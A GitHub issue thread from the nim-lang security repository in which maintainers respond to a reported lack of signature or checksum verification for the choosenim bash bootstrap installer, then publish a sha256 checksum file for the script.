search

nim-lang / security

Embargoed security issues that will be made public after a fix is made available. Use https://github.com/nim-lang/security/security
5 stars 2 forks source link

Choosenim bootstrap installation process using bash is not secure #3

Closed dom96 closed 3 years ago

dom96 commented 3 years ago

Sent to security@nim-lang.org from research@nightwatchcybersecurity.com:

The bootstrap installation process using a bash script is not entirely secure - no PGP signature is published and there is no way to check the download is legit: https://nim-lang.org/install_unix.html https://nim-lang.org/choosenim/init.sh

This can lead to supply chain attacks such as the one that just happened here: https://about.codecov.io/security-update/

A checksum and a way to verify it should be provided, and security information should be added to the webpage referenced above. Ideally this should be done via PGP.

Thanks

dom96 commented 3 years ago

Immediate thought: how does rustup handle this?

alaviss commented 3 years ago

Sign the script and/or publish the checksum somewhere trustworthy, similar to what we do with our binary releases.

Any form of validation would have to be done by the user since if we automate it there's no reason why an attacker can't just remove the verification code.

dom96 commented 3 years ago

Cool, easy fix then. I will try to do that todayASAP.

dom96 commented 3 years ago

FWIW I don't actually see rustup offering anything like this: https://rustup.rs/. But to be consistent with the sha256 sums we have for Nim releases, I will create one for this script.

dom96 commented 3 years ago

https://nim-lang.org/choosenim/init.sh.sha256 now exists